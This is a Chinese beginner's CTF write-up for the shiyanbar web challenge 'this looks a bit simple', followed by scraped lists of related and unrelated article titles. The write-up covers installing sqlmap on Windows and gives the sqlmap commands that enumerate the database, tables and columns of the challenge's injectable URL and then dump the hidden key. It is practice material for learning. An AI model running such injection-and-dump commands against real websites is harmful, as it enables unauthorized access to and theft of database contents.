实验吧ctf题库:这个看起来有点简单!
查看这道题先登陆“实验吧”,地址为 http://www.shiyanbar.com/ctf/33 。
这是一道十分基础的web题目,因为我也是刚刚接触ctf,记录一下第一道题的解题过程,算是自己的一个回顾吧,同时也给一些想要入门的朋友一点点微弱的参考吧。
一、sqlmap的安装
在windows下安装sqlmap需要先下载适用windows的sqlmap版本和python。
sqlmap的下载地址为:https://github.com/sqlmapproject/sqlmap/tarball/master。
python下载地址为:https://www.python.org/。我的python用的是2.7版本。
安装好python后, 在python文件目录下新建一个sqlmap文件夹。sqlmap的压缩包解压后能得到下图文件夹,将里面的内容复制到新建的文件夹sqlmap下面。
在sqlmap目录下打开cmd,输入python sqlmap.py --version 测试是否安装成功。
如果结果为上图,说明安装成功。
二、使用sqlmap解题
首先cmd到之前的sqlmap目录下,输入python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" --current-db 。引号内是存在注入点的网址。
运行后,得到数据库名称 my_db
然后查看一下表,输入python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db --tables。
发现有一个thiskey表,猜测需要的信息就藏在thiskey中,于是输入python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey --columns。
得到一个txt类型的k0y,然后再dump出来就完事了。
输入python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey -C k0y --dump
得到k0y的值。
实验吧ctf题库:这个看起来有点简单!相关推荐
- 实验吧CTF题库-密码学(部分)
这里没有key: 打开链接,有一个弹窗 然后就是一个空白网页,右键查看源代码 这里有一串js密文,解密一下,https://www.dheart.net/decode/index.php 得到flag ...
- CTF题库—实验吧(密码学)之疑惑的汉字
版权声明:如果对大家有帮助,大家可以自行转载的.原文链接: https://blog.csdn.net/qq_37992321/article/details/84573915 1.首先点开解题链接: ...
- CTF题库实验吧分道扬镳 (注意进入正确的流程,用最短的步骤走完迷宫。)
用 IDA 打开 od打开发现不会调试 白学了 找到这两个关键函数 反编译得到 代码 char *sub_401020() {char *result; // eaxchar *v1; // [esp ...
- CTF题库—实验吧(密码学)之困在栅栏里的凯撒
版权声明:如果对大家有帮助,大家可以自行转载的.原文链接: https://blog.csdn.net/qq_37992321/article/details/84574878 1.先看看题目:困在栅 ...
- CTF题库实验吧女神 (猫流大大发现一个女神,你能告诉我女神的名字么(名字即是flag))
下载后解压得到 直接用notepad++ 打开 nvshen.txt 可以看出来应该是 base64加密过的 1.直接进行解密 (notepad居然带有解密工具) (记得要全选中才行) 得到了 pn ...
- ctf题库--1000
<题目> 答案格式:CTF{} 解题链接: http://ctf5.shiyanbar.com/misc/1000.exe <解答> 打开题目链接下载文件,打开exe,在输入密 ...
- CTF题库疑惑的汉字
现有一段经过加密的密文,内容如下: 王夫 井工 夫口 由中人 井中 夫夫 由中大 请找出这段密文隐藏的消息明文. 一看这几个字我就知道是当铺密码 不知道为什么哈哈哈哈哈哈 (当铺密码 就是一种将中 ...
- CTF题库奇妙的音乐
据说flag就藏在这段音乐中,请仔细听. 格式:CTF{} 我们下载压缩包加压后 看到 还有一个压缩包是需要密码才可以 解压的 图片是这样的 我觉得提示的已经够明显了 海伦凯勒的<假如给我三 ...
- ctf题库--这是什么鬼东西
<题目> what a fuck!这是什么鬼东西? 解题链接: http://ctf5.shiyanbar.com/DUTCTF/1.html <过程> 打开链接,弹出的是一堆 ...
- CTF题库RSA实践 (RSA-Tool2 by tE! 工具的使用)
在一次RSA密钥对生成中,假设p=473398607161,q=4511491,e=17 求解出d 将得到的d提交 这道题说实话应该不难的 就应该看一看 RSA算法 这里先分享一个工具 RSA- ...
最新文章
- android weight(权重)的具体分析
- java integer int 比较_java Integer和int之间的比较问题是什么?
- JAVA就业指导(转)
- java1.5连接oracle12c_java1.5连接oracle12c
- shell中的条件语句
- iOS应用跳转qq指定联系人聊天
- 加州圣地亚哥电子和计算机工程研究生申请入口
- C# 通过pid获取hwnd / 通过pid查找hwnd
- matlab 图像旋转补色,旋转互补色光学错觉
- 手把手教你学Dapr - 6. 发布订阅
- linux提权辅助工具(二):linux-exploit-suggester-2.pl
- 7-11 名人堂与代金券 (25 分)
- Python爬虫教程之Scrapy 框架
- QQ 二十年沉浮起落,黑产从未缺席
- FISCO BCOS 数据结构与编码协议 交易结构 区块结构
- ASO关键词排名的三种优化方式,aso关键词排名优化是
- 国培计算机网络技术培训心得,2017国培学习心得体会及感受
- 首金奥运健儿杨倩,获得金牌和奖金缴纳个税吗?雅戈尔赠送她一套房,交税吗?
- GitHub网页版提交PR
- 4.28 前端开发日报
热门文章
- Mqtt精髓系列之保留消息Retained Messages
- Mysql-DQL基础查询
- 错误:There was a problem confirming the ssl certificate: [SSL: CERTIFICATE_VERIFY_FAILED] certificate
- luogu1378 油滴扩展 (深搜)
- 台式电脑经常碰到的一些问题
- nova云主机evacuate简单分析
- BZOJ 1189([HNOI2007]紧急疏散evacuate-网络流二分+拆点)
- 基于VGGFace2的人脸性别年龄检测系统(源码&教程)
- java中以yyyyMMddHHmmss格式取得系统时间
- PAT 1007(简单粗暴)